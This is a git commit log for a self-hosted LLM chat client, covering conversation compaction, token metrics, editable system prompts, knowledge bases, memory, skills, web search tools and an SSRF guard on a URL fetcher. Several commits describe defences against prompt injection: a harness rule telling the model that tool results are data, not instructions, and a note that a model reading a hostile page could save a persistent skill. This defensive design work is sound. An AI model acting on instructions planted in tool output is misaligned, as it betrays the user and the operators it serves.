27 Commits

Author SHA1 Message Date
Jaroslav Beneš 584beca22d Version 0.3.0
A regenerate button that works, per-reply metrics, temporary chats, prompt
suggestions, an admin request inspector and compaction. The bump also
invalidates the service worker's cache, which is keyed on it.

Co-Authored-By: Claude Opus 5 (1M context) <noreply@anthropic.com>
2026-08-01 01:04:47 +02:00
Jaroslav Beneš 17f3fa1946 Compaction: a button, and automatically when the window fills
A long conversation eventually just stops working. Compaction summarises the
earlier turns and sends the summary in their place.

The messages are kept. They stay in the transcript behind a collapsed
divider and simply stop being part of the request, which is what makes the
button safe to press and automatic compaction safe to have at all: a summary
that came out badly is a bad turn, not a lost conversation.

Stored on the Chat, not as a synthetic Message. A synthetic row needs a
role -- `system` breaks the one-system-message rule the moment build_messages
emits it beside the harness, and user/assistant makes it a turn people can
edit, regenerate from and copy, indistinguishable from a real one in all
four places a bubble is rendered. Worse, "editing rewinds, it does not
branch" would silently delete it and leave no marker that compaction had
happened at all.

The summary goes out as a user turn and an assistant turn, not one. A
leading assistant breaks templates requiring the first non-system message to
be user; a lone leading user produces user, user whenever the kept history
starts on a user turn -- which it always does, because the cutoff lands on a
finished reply.

compacted_through_id is a plain id rather than a foreign key: migrations.py
compiles only the column type, so a REFERENCES clause would exist on a fresh
database and not on an upgraded one, and a constraint half the fleet has is
worse than none. cutoff_message validates it on every read instead, and a
rewind past the boundary clears it.

Compacting again summarises only the delta, with the previous summary
supplied to be subsumed. Re-summarising the whole chat each time grows
quadratically and eventually exceeds the window it is protecting.

Automatically at the top of _run, not in post_message: that route's contract
is to return immediately and leave the slow part to a resumable connection,
and it also means build_request is called once, after compaction, with no
second assembly path. The trigger is the last reply's recorded usage plus an
estimate of the new turn -- retrospective because true prompt_tokens are only
knowable after a response, plus the delta because otherwise fifty thousand
characters pasted into the composer overflow a window that read 90% last
turn. It never fires when the context length is unknown. It does fire on
estimated counts, which is safe here precisely because nothing is lost.

_maybe_compact never raises: a failure logs and sends the uncompacted
request. A `status` event says "Summarising earlier messages…" in the
meantime, because a silent multi-second pause before the first token is what
a hang looks like.

The wording is three fragments under Admin - Prompts. Clearing task.compact
turns compaction off entirely.

Also adds compaction.moment(): SQLite does not store the offset, so a row
loaded from disk is naive while one in the session's identity map keeps its
tzinfo, and comparing the two raises. Every comparison here is between
exactly those.

Co-Authored-By: Claude Opus 5 (1M context) <noreply@anthropic.com>
2026-08-01 01:02:02 +02:00
Jaroslav Beneš 314cc946d7 An admin inspector on the right of the chat
A third child of .shell, opening and closing like the sidebar opposite it,
showing the system message that would go out, the tools offered, what the
last reply cost, and the whole request body as JSON.

Rebuilt, not recorded. Recording every request would store a copy of the
growing conversation against every message -- quadratic in chat length -- and
the thing an administrator debugging a bad answer actually wants is what the
current configuration produces. The panel says exactly that at the top, so
nobody mistakes it for forensics.

Owner-checked and admin-checked, not admin alone. permissions.resolve giving
an admin everything is about configuration, which they can grant themselves
anyway; reading someone's conversation is a different act, and it is why
sharing.visible_to has no admin branch. An inspector that could dump any
user's transcript would be that branch under another name.

No new JavaScript. app.js already delegates [data-toggle], and
hx-trigger="intersect once" makes the load lazy for free: a hidden element
never intersects, so the request fires the first time it is opened and never
on a page load nobody looked at.

Image data URIs are replaced before dumping -- fidelity is the point, but not
several megabytes of base64 in the DOM. Everything renders through normal
escaping and never |safe: this JSON is full of model output, search results
and uploaded documents.

Co-Authored-By: Claude Opus 5 (1M context) <noreply@anthropic.com>
2026-08-01 00:51:57 +02:00
Jaroslav Beneš 26793b1317 Prompt suggestions on the new-chat screen
A blank composer is the least helpful thing a chat client can show someone
who has just installed one. Three cards now sit under the empty state, and
an administrator manages them at /admin/suggestions.

Clicking a card fills the composer and stops there. It deliberately does not
send: every default ends mid-sentence, because a card is a starting point
rather than a question somebody already asked, and the caret lands where the
person has to start typing.

Seeding is guarded by a settings flag, not by "is the table empty" --
otherwise an administrator who decided against them would get all three back
on every restart. Capped at twelve, six shown: past a dozen this is a menu,
and a menu on the empty screen is a worse blank page than a blank page.

The cards are gated on there being no chat at all, not on the thread being
empty. An empty chat someone opened on purpose already has a model and a
prompt chosen.

Also fixes a pre-existing bug the position test caught. Both this and
_refresh_models wrote `coalesce(max(position), -1) or -1`, and position 0 is
falsy -- so the second row landed back on 0 on top of the first. The
coalesce was already doing that job; the `or` was undoing it.

Co-Authored-By: Claude Opus 5 (1M context) <noreply@anthropic.com>
2026-08-01 00:49:12 +02:00
Jaroslav Beneš 09eecbdd9a Temporary chats
A clock in the top-right starts one. It is never listed in the sidebar and
is swept a day after the last thing said in it.

A real row rather than something held in the browser, because a reload, a
crash or a background tab all look identical from here -- "delete when you
navigate away" would lose conversations people meant to keep. The flag rides
in the URL (/chat?temporary=1) rather than in JavaScript, so it survives a
reload and can be bookmarked, and the composer carries it as a hidden field
beside model_id.

Keep clears the flag. Without a way out, a conversation that turns out to
matter is destroyed a day later with no recourse, and people would find that
out exactly once.

archived was filtered in three places and temporary mirrors all three, plus
Folder.visible_chats. It also skips the unread flag in _persist: there is no
sidebar row for the dot to land on, and the toast would name a chat nobody
can navigate to.

The sweep measures age from the newest message, not from the chat row.
created_at would destroy a conversation still in use at hour 23, and
updated_at does not move when a message is inserted -- onupdate fires on an
UPDATE of the chat, and adding a message is not one. It runs at startup
beside the existing upload sweep.

Deleting a chat cascades its rows but leaves the files on disk; only the
orphan sweep unlinks anything, and it looks only at uploads that were never
attached. files.remove_files_for_chats() closes that for the new sweep. The
same hole in delete_chat is pre-existing and left for its own change, which
can now call the same helper.

Co-Authored-By: Claude Opus 5 (1M context) <noreply@anthropic.com>
2026-08-01 00:45:03 +02:00
Jaroslav Beneš e185edc9e1 Show what a reply cost, live and afterwards
Tokens, how full the context is, and tokens per second -- as chips under
each assistant bubble, updating while the reply streams and still there when
it finishes.

The numbers come from one Metrics object built either from the generation
still being written or from the row it left behind. That is the point rather
than tidiness: the finished bubble is re-rendered from the database the
instant the stream ends, so two code paths would make the figures visibly
jump at exactly the moment someone is watching them. Here the only thing
that changes is that an estimate may become exact.

Message.usage_json has existed and been dead since the schema was written.
It is the store.

Two counts that look like one. prompt and completion are summed across tool
rounds -- what the reply cost. context_tokens is overwritten each round with
that round's prompt plus completion -- what the window actually holds. A
three-round reply pays for its prompt three times and only ever occupies the
window once, so a single number would be wrong for one of the two questions.

Generation gains started_at as a field rather than a local in _run, because
_follow is a different function that sees only the Generation and otherwise
has nothing to compute a live speed against. It also carries a prompt
estimate taken before the first chunk, since real usage arrives in one chunk
at the very end and a percentage that appears only after the reply is
useless.

Everything is marked with a tilde when the endpoint reported nothing, and
the percentage is simply absent when no context length is set: unknown has
to stay tellable from small, and a percentage of an unknown total is a
made-up number in a place people trust numbers.

Co-Authored-By: Claude Opus 5 (1M context) <noreply@anthropic.com>
2026-08-01 00:40:44 +02:00
Jaroslav Beneš 9e2caeac48 Ask the endpoint what a streamed reply cost
A streamed completion carries no token counts unless you ask for them, and
`stream_options: {include_usage: true}` is how. Not every server implements
it, and an unknown key is a 400 from some -- the same hazard as sending a
tools array to an endpoint without support. So it is asked for once per base
URL per process, and an endpoint that refuses is remembered and retried
without it. The retry is safe because the status is checked before a single
line is read: nothing has been yielded, so there is nothing to duplicate.

chunk_usage() reads the resulting chunk. It needed no change to the loop
above it: a usage chunk carries `choices: []`, which is exactly the shape
delta_text, delta_reasoning, delta_tool_calls and finish_reason have always
returned early on. All-zero counts are treated as absent, because some
servers attach zeros to every chunk and the real numbers only at the end.

services/tokens.py is the fallback for endpoints that never report: four
characters to a token, counting the tools array because thirteen schemas is
a meaningful slice of a short window, and counting nothing for an image
because its cost depends on tiling and an invented number would be worse
than the omission. Crude on purpose -- a real tokeniser means one per model
family, for a figure that is displayed beside a tilde.

Nothing uses any of this yet.

Co-Authored-By: Claude Opus 5 (1M context) <noreply@anthropic.com>
2026-08-01 00:36:12 +02:00
Jaroslav Beneš 2fe736aa6a Models know how much context they hold
A column rather than a key in capabilities_json, which is rebuilt wholesale
from the submitted checkboxes on every save and would destroy a number
living in it.

0 means unknown, and unknown has to stay tellable from small: the context
percentage and automatic compaction both refuse to act on a figure nobody
supplied. Filled in from /v1/models where the runner advertises it --
OpenRouter, vLLM and llama.cpp each spell it differently, so context_from()
reads the four spellings actually in use, accepts a quoted number but not
"8192 tokens", and rejects anything outside 256..10,000,000. Applied on
discovery only when nothing is set: a refresh must never undo a correction,
since an administrator sets this precisely because the endpoint was wrong.

Co-Authored-By: Claude Opus 5 (1M context) <noreply@anthropic.com>
2026-08-01 00:33:50 +02:00
Jaroslav Beneš 6dd13b2e9d One thread template, one sidebar toggle
chat/index.html and chat/_thread.html held the same loop, so anything added
to the conversation -- a compaction divider, say -- would have had to be
written into both and kept in step by hand. index.html includes the partial
instead.

The sidebar toggle was a raw inline onclick, the only one left in the
application. app.js already delegates [data-toggle="#selector"] and gives
open/close, aria-expanded and an is-active button state for free; the chat
settings gear has used it all along. Also deletes the
.sidebar[data-collapsed="true"] rule, which nothing has ever set.

Co-Authored-By: Claude Opus 5 (1M context) <noreply@anthropic.com>
2026-08-01 00:31:26 +02:00
Jaroslav Beneš ec457debb3 Archived chats no longer show inside folders
The unfiled list has filtered archived chats since archiving existed
(api/pages.py). The folder branch went through the ORM relationship, which
filters nothing, so an archived chat kept appearing as long as it was
filed -- and the "Empty" check read the same unfiltered list, so a folder
holding only archived chats would have claimed to be empty while listing
them.

Fixed on the model rather than in the template, as `Folder.visible_chats`.
The loop and the empty check now cannot disagree, because there is one
list and the template binds it once. Ordering matches the unfiled list:
pinned first, then most recently touched.

Co-Authored-By: Claude Opus 5 (1M context) <noreply@anthropic.com>
2026-08-01 00:30:08 +02:00
Jaroslav Beneš 85f18e99b2 Regenerate actually regenerates
`ensure` is keyed on message_id and idempotent on purpose -- a page load
finding an unfinished reply must attach to it rather than start a second
one, and `_follow` calls it too. But finished generations linger in the
registry for KEEP_FINISHED so a follower arriving at the last moment still
gets the final frames, and regenerate is the only caller that reuses an
existing Message row instead of creating a new one. So `ensure` handed back
the finished generation: no request was made, `_follow` replayed the old
answer, and the `done` frame re-rendered a streaming shell because the row
said incomplete. That is the reconnect loop, and the Send button stuck on
Stop. It appeared to work after five minutes only by accident, and only
sometimes: `_prune` sat below the early return, so it was unreachable for
exactly the message that needed it.

`restart()` is the explicit opposite of `ensure`, and regenerate calls it.
`_prune` moves above the lookup.

Cancelling a live predecessor makes its `finally:` run `_persist` on the
same row, which would overwrite the reply that replaced it. `_persist` now
refuses when another generation owns the message -- "someone else owns this
row now", not "this one is registered", so a direct call still writes.

Three things found next door, all in the same area and all bugs:

  - `done` was set before `_persist` committed, while `_follow`'s docstring
    claimed the opposite. `_follow` breaks out the instant it sees the flag
    and re-renders the bubble from the row, so the row has to be right
    first. Harmless today, a guaranteed loss once metrics land there.
  - Live reasoning duplicated quadratically. The frame carries the whole
    block each time, exactly as `render` and `tools` do, but the target
    swapped it `beforeend`.
  - `sse.KEEPALIVE` was defined and never yielded. A model thinking for
    ninety seconds emits nothing, and an idle connection is what a proxy
    closes.

There was no test for regenerate at all. There is now.

Co-Authored-By: Claude Opus 5 (1M context) <noreply@anthropic.com>
2026-08-01 00:28:19 +02:00
Jaroslav Beneš 2c8c274850 Every injected prompt becomes editable, and several get written
The instructions LLeMbas puts in front of a model were hard-coded: six
strings in a GUIDANCE dict, two headings, and the title request inline in
chat.py. An operator could not see what was being sent, let alone change
it, and there was nowhere for a custom tool to contribute its own guidance
when custom tools land.

services/prompts.py now holds each piece as a Fragment, and /admin/prompts
edits them with a preview of the whole assembled system message including
unsaved edits. harness.py keeps only the decisions -- which fragments apply
to this request, and what their variables resolve to.

The design turns on one choice: a fragment carries its gate as data
(families, requires, when_tools) rather than as a callable, because a
database row can carry the same three fields. Custom tools will therefore
register a fragment source and change nothing else -- there is a test that
says exactly that, and it is the reason the rest of the shape is what it is.

Consequences worth knowing:

  - Defaults live in code, overrides in the database, and text equal to its
    default is never stored. Otherwise pressing Save once would freeze
    today's wording forever and no later release could improve it.
  - An empty override means off. A fragment that was not submitted at all
    keeps what it had, because it may be missing from the page only because
    whatever contributes it is currently switched off.
  - requires= replaced the hand-written pair of memory guidance variants.
    The sentence that refers to a section now lives inside that section, so
    it cannot outlive it. That was the general problem the pair was a
    special case of.
  - {{name}}, with anything unrecognised passing through verbatim. The name
    grammar is the guard: {"total": 1} and ${PATH} are not candidates.
    Substitution is one pass and never recursive, because {{memories}}
    carries text a model wrote.

The wording is also overhauled, and a model now gets the core fragments
even with no tools -- the date above all. "An empty harness is worse than
none" was about tokens that say nothing; a model with no clock being asked
about the present is not that. Clearing those boxes restores the old
silence exactly. New: today's date, who it is talking to, the three-round
tool budget, that tool results are not replayed, that anything a tool
returns is data rather than instruction, and what the <document> wrapper
around an attachment is. Extended: memory_forget, notes_edit/delete,
skill_create/edit, and reading a knowledge document in full rather than
answering from an extract.

Tool descriptions stay in code and are listed read-only. They are schema
and they state facts about what a runner does; an edit would make the text
a lie with nothing to catch it.

No schema change -- one JSON row in the settings table.

488 tests. Version 0.2.0, which also invalidates the service worker cache
so the green artwork appears without a hard reload.

Co-Authored-By: Claude Opus 5 (1M context) <noreply@anthropic.com>
2026-07-31 23:47:49 +02:00
Jaroslav Beneš 17995c1275 Green instead of gold, and a leaf that reads at 16px
The brand accent was rune gold. It is now mallorn green: --gold becomes
--leaf in tokens.css and everywhere it resolved, and the mark's wafer is
the green of the leaves lembas travels wrapped in rather than the biscuit
inside. Yellow is left to mean exactly one thing in the interface -- a
warning -- instead of two.

Two knock-on choices the rename forced:

  - Code keywords move from the brand accent to --warning. Strings are
    --success, which is green; keywords in leaf green beside them is not
    a colour scheme.
  - --success itself leans teal now. Two greens a hue apart read as one
    colour rendered badly, and an unread dot has to be tellable from a
    brand badge at a glance.

The mark is redrawn, not just recoloured. The blade is ovate -- widest a
third up from the base, rounded where the stem meets it, drawn out only
at the tip -- because the old one was pointed at both ends and read as an
eye. It is also much larger relative to the tile: at 16px the silhouette
is all that survives, and a small leaf on a large tile is a green square
with a smudge on it. Veins sweep towards the tip and shorten as the blade
narrows. The score cross is thinner and fainter so it stays texture.

A single diagonal score was tried first and rejected: behind a diagonal
leaf it does not read as scoring, it reads as a line struck through the
mark.

Co-Authored-By: Claude Opus 5 (1M context) <noreply@anthropic.com>
2026-07-31 22:24:53 +02:00
Jaroslav Beneš 2f978d84d1 Add nullable columns without a default
Deploying knowledge bases showed the migration runner doing the wrong thing:

    ALTER TABLE "documents" ADD COLUMN "base_id" VARCHAR(32) DEFAULT ''

`base_id` is nullable and its absent value is NULL, but the runner derived a
default from the column type and backfilled every existing row with the empty
string. Nothing then matched `base_id IS NULL`, so the startup sweep that files
pre-bases documents into a default base would have skipped all of them and the
documents would have stayed invisible.

Nobody lost anything -- the live instance had no documents yet -- but the fault
is general: any nullable column added from here would arrive as "" rather than
NULL, and every "is this set?" check would be wrong about the rows that predate
it. So a default is now emitted only for NOT NULL columns, where SQLite requires
one.

The sweep also accepts "" as meaning unfiled, since a deployment that upgraded
through the previous release has rows holding it.

Co-Authored-By: Claude Opus 4.8 (1M context) <noreply@anthropic.com>
2026-07-21 20:03:01 +02:00
Jaroslav Beneš a0f733063a Knowledge bases, and a file input that lines up
**Bases.** Documents now live in named collections rather than one flat pile,
and a chat can be pointed at particular ones — "answer from the contracts
folder" is a different question from "answer from everything I have ever
uploaded". A chat with none attached still searches everything its owner can
see, because empty means unscoped, not empty.

The harness names the attached bases. Without that the model cannot tell "there
is nothing about this" from "I am only allowed to see one folder", and it
phrases a miss as the former.

**Sharing moves to the base.** A document is visible to whoever can see the base
it lives in, so `Document` is gone from the shareable types and
`documents.visible()` filters through `base_id`. "This folder is the team's" is
the granularity people think in; per-document grants meant answering "who can
see this?" by checking every file. Moving a document between bases changes who
can see it, so the destination has to be one you own.

`Document.base_id` is nullable only because the column had to be added to a
table that already had rows. `sweep_unfiled()` runs at startup beside the
orphaned-upload sweep and files anything predating bases into its owner's
default, which is what makes "always set" true everywhere else.

**The file input.** `.input` gave it a fixed height and horizontal padding, so
the browser's own button sat hard against the left edge while the filename
floated off the centre line. A file input is two controls in one box and
neither inherits anything useful, so it gets its own rule: no horizontal
padding, the button sized to `--control-h` with the divider that separates it,
and the text centred with line-height rather than flexbox, which file inputs do
not lay out reliably.

437 tests, ruff clean.

Co-Authored-By: Claude Opus 4.8 (1M context) <noreply@anthropic.com>
2026-07-21 20:00:15 +02:00
Jaroslav Beneš 21001f2eb8 Knowledge, notes, memory and skills, and a harness to make them used
Four places a model can reach for, differing in who writes a record and how it
gets in front of the model.

**Knowledge** is uploaded by a person and searched by the model. It goes through
`services/files.py:prepare` — the same pipeline as a chat attachment — so the
same PDF produces the same text whichever way it arrived, and `Document` carries
the same content columns as `Attachment` for the same reason.

**Notes** are written by the model and edited by you. Too long to inject, so
they are searched.

**Memory** is short facts, and every one of them goes into every request. That
single decision is where the rest of its design comes from: records are capped
short, the block has a budget, there is no search tool because the model is
already looking at them, and they are not shareable — a record about a person is
not content to hand round.

**Skills** are saved procedures. Only the name and description are injected; the
body is fetched when the model decides one applies, which is what makes a
hundred skills affordable. A model may write and revise its own — the safety
story is not a gate but a record: every revision is kept, attributed and
revertible. A model that has just read a hostile page can save a skill that
outlives the conversation, and the honest mitigation is that it is visible and
undoable rather than that it was prevented.

**The harness** is why any of it gets used. A model handed a tools array
ignores it and answers from recall, because nothing in the request suggests
otherwise. `services/harness.py` assembles a preamble from what this chat
actually has: when to reach for each tool, the memories, the skill index.

This is an exception to "system prompts are precedence, not concatenation", and
a deliberate one. That rule governs the three *authored* layers and is
untouched — exactly one still wins. The harness is a different axis: it
describes the machinery rather than the behaviour, nobody authored it, and there
is nothing for it to disagree with. It is prepended to whichever authored prompt
won, in one system message, since several endpoints reject a second.

Supporting changes:

- **Sharing**, in one helper. `visible_to()` is the only definition of who can
  see a library item and every listing and tool goes through it. Sharing grants
  *reading*; two people editing one note with no history and no merge is worse
  than copying it. **Administrators do not bypass this** — they bypass
  permissions elsewhere because an admin can grant themselves those anyway, but
  reading somebody's private notes is a different act.
- **FTS5**, created by `db/migrations.py:ensure_fts` with the triggers an
  external-content index needs. Idempotent, like the column sync beside it.
  Terms are ANDed and then ORed: the caller is usually a model writing a whole
  question, and requiring every word loses the match on one absent term.
- **The attach button is a menu** — file, image, a web page, or a document from
  the library. Attaching a document copies it, because history must not change
  when a document is edited later.
- **A URL fetcher with an SSRF guard.** This server can reach the router, the
  other services on the box and LLeMbas itself, and the address can come from a
  model. Private ranges are refused *after resolution* and redirects are followed
  by hand so every hop is checked. An admin can open it deliberately.
- **Model capabilities split** into protocol support and a toggle per built-in
  tool. Rows predating the split have no `tool_*` keys, and absent counts as on
  when `tools` is on — otherwise an upgrade silently takes web search away from
  every model already configured for it.

Also fixes the test fixture, which built the schema with `create_all` and so ran
against a database without the FTS tables production has; it now runs
`sync_schema`, the same path startup takes.

430 tests, ruff clean.

Co-Authored-By: Claude Opus 4.8 (1M context) <noreply@anthropic.com>
2026-07-21 19:43:57 +02:00
Jaroslav Beneš a8b7b5fc14 Fix the settings tabs, and space a form from what follows it
**The Audio tab rendered nothing.** The tabs are radios plus sibling
selectors, and the CSS named every tab twice -- once to highlight its label,
once to show its panel. A tab added without also adding those two rules gets a
label that selects nothing, which is not something anyone catches in review; it
looks like a blank page.

Replaced with rules that derive what they can. The active label is
`input:checked + .tabs__tab`, which needs to know nothing at all. The panel is
matched by position -- CSS cannot compare a radio's id with a panel's data-tab
-- so the Nth radio shows the Nth panel. Both lists render in the same order
and a conditional tab drops out of both at once, so they cannot drift. There is
a test asserting the two orders match, including with Audio absent.

**A card following a form sat flush against Save.** The "Try it" panel on the
search page read as another field of the settings form. The gap belongs to the
form rather than to its action row: the action row is always its form's last
child, so a bottom margin there has nothing to push away from. Adds
`.form-actions` and a bottom margin on a form that is a direct child of an
admin page.

Also says plainly in the dictation settings that a server hosting one model
ignores the model field, so `whisper-1` there is a label rather than a
selection.

Co-Authored-By: Claude Opus 4.8 (1M context) <noreply@anthropic.com>
2026-07-21 18:36:41 +02:00
Jaroslav Beneš 7456525d19 PWA, one send/stop button, audio in and out, web search as a tool
Four pieces of work.

**Installable.** A manifest carrying the instance name, PWA icons rasterised
from the existing mark at design time, a service worker and a themed offline
page. The worker caches the shell only and bails out on /api/, /auth/, /admin/
and anything accepting text/event-stream -- passing a reply stream through a
worker turns it into one delivery at the end, or nothing. It is served from
GET /sw.js rather than the static mount because a worker's scope is the path it
came from.

**Send and Stop are one button.** They were two, and the hidden one was never
hidden: `.btn` is display: inline-flex, which outranks the browser's own
`[hidden] { display: none }`, so Stop sat permanently beside Send. app.css now
forces the attribute to win -- every control toggled with `hidden` depended on
that -- and the composer renders one button carrying both icons, with ui.js
flipping data-composer-action and the type with it.

**Audio.** Speech to text and text to speech against any OpenAI-shaped
/v1/audio/* endpoint: dictate into the composer, have a reply read out.
Instance settings in Admin, per-reader overrides in Settings, with the voice
list discovered from the server where it offers one. Recorded audio is capped
and never written to disk -- it is not an attachment, it has no owner, and
nothing would ever sweep it.

**Web search, as a tool.** This is the tool loop PLAN.md described as the real
work: one reply is now a bounded sequence of requests rather than one. The model
asks, the tool runs, the result goes back and it is asked again, up to three
rounds. Providers are DuckDuckGo (no setup), SearXNG and Firecrawl.

Two decisions worth stating. Tools are only offered to models flagged `tools`,
because an endpoint without support rejects the whole request rather than
ignoring the array -- the same reason images only reach models flagged
`vision`. And tool results are not replayed as context on the next turn, for the
same reasons reasoning is not: the answer already contains what the model made
of them, and replaying stale results into every later request wastes the window
and reliably sends a small model into a search loop. The sources stay visible in
the transcript instead.

Search results are untrusted third-party text and are treated as such: escaped,
and only http/https URLs rendered as links.

338 tests, ruff clean.

Co-Authored-By: Claude Opus 4.8 (1M context) <noreply@anthropic.com>
2026-07-21 17:56:50 +02:00
Jaroslav Beneš de178837b8 Background generation, unread replies, send/stop, PLAN.md
**Replies now run in the background.** Generation was driven by the SSE
request, so navigating away or opening another chat cut the answer off
mid-sentence. services/generation.py owns the work as its own task and
the SSE endpoint merely follows it. Verified: attached briefly, closed
the connection, went to another page -- the reply finished anyway, 832
characters, not marked stopped, auto-titled.

Reattaching works because both `render` and `reasoning` frames now carry
the whole block rather than a delta. A follower arriving late has no
earlier fragments to append to, so deltas would leave it permanently
missing the beginning. Verified: attached six seconds in and the first
frame already contained 517 characters written while nobody watched.

**Unread indicator.** A reply that lands with no follower attached marks
its chat unread; the sidebar polls every 10s for out-of-band dot spans
plus an HX-Trigger that raises a toast. Polled rather than pushed: a
browser sitting on another chat has no connection to the one that
finished, and an always-on channel per tab is a lot of machinery for a
green dot. `unread_notified` stops the same arrival being announced
every tick. Follower count is what decides "was anyone watching", so
reading it as it arrives does not mark it unread -- verified both ways.

**Stop is the send button.** While a reply is being written the send
button becomes a red stop square, found via a MutationObserver on the
thread since the composer and the streaming bubble are far apart in the
document. The in-bubble Stop is gone.

**Attachment border removed.** As asked -- an attachment is a picture,
and the frame only ever drew at the wrong width. The anchor now
shrink-wraps and the img's width/height attributes are overridden so a
small image shows at its own size.

Adds PLAN.md: what is built, what is not, known limits, and the
decisions that look like oversights until you know the reason.

239 tests, ruff clean.

Co-Authored-By: Claude Opus 4.8 (1M context) <noreply@anthropic.com>
2026-07-21 14:52:28 +02:00
Jaroslav Beneš a071d8486b Live Markdown, stop, rewind, custom picker, dialogs
Seven things.

**Reasoning starts closed.** The answer is what the reader is waiting
for; the thinking is one click away.

**Image borders.** .attachments__image was a block-level <a>, so its
border stretched the full column around a narrow picture. inline-block,
and the frame is the picture. Same fix for the composer thumbnail.

**Markdown now renders during the stream.** The generator re-renders the
answer so far and sends it as a `render` event at most every 100ms,
swapped with innerHTML, instead of appending escaped tokens and
formatting everything at the end. Re-rendering whole rather than
appending is the point: a list or a code fence is only correct once its
context exists, and partial syntax resolves itself as more arrives.
Measured against a live model: 29 render events, formatting visible from
the first content token.

**Stop button.** A stop request goes into an in-process set the
generator checks between chunks; whatever arrived is kept, because a
half-written answer the reader chose to cut short is still worth having.
Measured: stream ended 0.2s after the request, 1155 characters
preserved, message marked stopped rather than errored. Navigating away
does the same thing via CancelledError.

**Rewind and edit.** Edit one of your own turns and everything after it
is deleted, then the conversation runs on from there. Deliberately not
branching: that needs a UI for choosing between versions, and "go back
and try again from here" is what was asked for. The form states how many
messages will be discarded before you confirm.

**Custom model picker.** A <select> renders only text in an <option>, so
it can never show an avatar. Built from buttons and a hidden input, with
descriptions, capability tags, a filter box past eight models, and
arrow-key navigation written out by hand since there is no native widget
doing it.

**Notification system.** lembas.notify/confirm/prompt in ui.js, built on
<dialog> so focus trapping, Escape and page inertness come from the
browser. htmx:confirm is intercepted, so every existing hx-confirm gets
the themed dialog with no change at the call site; the browser's grey
confirm() is gone from every template.

230 tests, ruff clean.

Co-Authored-By: Claude Opus 4.8 (1M context) <noreply@anthropic.com>
2026-07-21 14:33:04 +02:00
Jaroslav Beneš f744232d25 Fix attachments never being sent with the message
Uploading an image showed the chip and then did nothing: the file was
stored but never reached the model.

Two causes, both in the composer template.

The chips live in #attachments, and each carries the hidden file_ids
input that binds it to the message. That container sat OUTSIDE the
<form>, with an `hx-include="#attachments"` on a hidden <div> inside the
form meant to pull it back in. That attribute only has an effect on the
element issuing the request -- on a child of it, it does nothing. So the
form serialised content and nothing else, and post_message saw no
file_ids at all. Fixed by putting #attachments inside the form, where
the inputs are submitted because they are in the form, rather than
because of an attribute that has to be wired correctly. The file input
stays outside, since inside it would submit an empty file part on every
message.

Second: /chat preselected models[0] rather than the model a new chat
would actually use. With a vision model set as the default and a
non-vision one first in the admin ordering, the composer showed the
wrong model, sent the wrong model, and told the user images *would* be
sent when they would not. It now resolves through default_model(), the
same path /start uses.

Every server-side test passed throughout, because the bug was entirely
in the wiring between template and browser. Added tests that serialise
the rendered form the way a browser does -- every named input inside
<form> -- and assert file_ids is among them and the image reaches the
model as a content part. Verified they fail with the old markup
restored, then pass again.

Confirmed end to end against gemma4-e4b-q8: given a drawing, it replied
"Left: Green Circle / Right: Orange Triangle".

220 tests, ruff clean.

Co-Authored-By: Claude Opus 4.8 (1M context) <noreply@anthropic.com>
2026-07-21 14:08:52 +02:00
Jaroslav Beneš 085dca5ec4 Split the model admin into a list and a page per model
/admin/models rendered a full edit form for every model. With eight that
was merely long; with a hundred it was unusable, which is the report.

The list is now compact rows only -- avatar, name, badges, position,
reorder buttons, Edit link -- with search across id and display name,
filter tabs (All / Enabled / Disabled / Pinned / Restricted, each with a
count), a connection filter, and pagination at 40. Filters are links, so
a filtered view is a real URL you can keep. Editing moved to
/admin/models/{id}/edit, one model per page, with Previous/Next links so
a freshly imported connection can be tidied without returning to the
list each time.

Measured with 128 models: the list is 73 KB showing 40 rows over 4
pages, and a detail page is 17 KB. The old page would have rendered all
128 forms into one response.

Reordering needed rethinking at that size too. Up/down is fine for
nudging a model one place but hopeless for moving it sixty, so the
detail page has a position field you type into; the value is clamped and
a non-numeric one is ignored rather than throwing. The move buttons take
a `back` field so they return to whatever filtered, paginated view they
were pressed on instead of dumping you at page 1.

Also adds a select-all checkbox for the bulk bar, scoped to a container
selector rather than the page so a future list can carry more than one.

212 tests, ruff clean.

Co-Authored-By: Claude Opus 4.8 (1M context) <noreply@anthropic.com>
2026-07-21 13:43:00 +02:00
Jaroslav Beneš 7b67568f2c Fix bulk actions, create chats lazily, rework the UI
Seven reported problems.

**Bulk model actions 404'd.** /admin/models/{model_id} was registered
before /admin/models/bulk, and FastAPI matches in registration order, so
"bulk" was parsed as a model id. Moved above the parameterised route,
with a comment saying why, and a regression test.

**Empty chats piled up.** There is now no endpoint that creates one.
"New chat" is a link to /chat, which renders a composer with no row
behind it, and POST /api/chats/start writes the chat together with its
first message. Opening one and walking away leaves nothing.

**Pinning meant two different things.** The picker is now always in the
administrator's position order; pinned models get shortcuts in the chat
sidebar and nothing else. A picker whose order silently differs from the
admin screen is just confusing.

**Model images were missing in chat.** Assistant bubbles now show the
avatar of the model that actually wrote the turn -- which is not always
the model the chat is set to now -- falling back to the LLeMbas mark.
The picker shows it too.

**No global or per-model system prompt.** Three layers now: instance
(Admin -> General), model (Admin -> Models), chat. Precedence, not
concatenation: most specific wins outright. Stacking them reads well in
a settings screen and badly in practice, because two layers that
disagree give the model contradictory instructions and nobody can tell
which is losing. The chat panel shows the inherited prompt as
placeholder text so "leave empty to inherit" is not a guess.

**Alignment and button sizing.** Added --control-h and friends to
tokens.css; every button, input and select takes its height from them,
so a mixed row is flush by construction rather than by per-instance
nudging. Icon buttons are square at that height. Added .btn-row,
.card__header/.card__footer and .grid so pages stop carrying inline
styles, and moved every admin page onto them.

**Settings needed structure.** The user settings page is now tabbed
(Account / Models / Appearance / Security) using radio inputs and
sibling selectors -- no JavaScript, and the browser keeps the chosen tab
across a re-render.

Caught while checking: the chat.css surgery had deleted the attachment,
chip and dropzone rules. Restored, and there is now a check that every
literal class used in a template has a CSS rule.

197 tests, ruff clean.

Co-Authored-By: Claude Opus 4.8 (1M context) <noreply@anthropic.com>
2026-07-21 12:59:52 +02:00
Jaroslav Beneš bdce2764b1 File attachments: images for vision, PDFs and text into the prompt
Drag, paste or pick a file in the composer. Images go to vision models
as multimodal content parts; PDFs and text files have their content
extracted and placed in the prompt. Verified end to end against
gemma4-e4b-q8 on llama-swap: given a drawing and a text file, it named
the red square and blue circle and read the number out of the document.

Type is decided by inspecting the bytes, never the filename or the
browser's Content-Type -- a .png full of text is stored as text. Images
are downscaled to 1400px and re-encoded: a phone photo is several
megabytes of base64, which is slow and a large slice of the context
window. PDF text is extracted once, at upload, and stored; re-extracting
per request would let a reply change because a parser was upgraded.

Design points worth keeping:

- Images are only sent to models an administrator has marked `vision`.
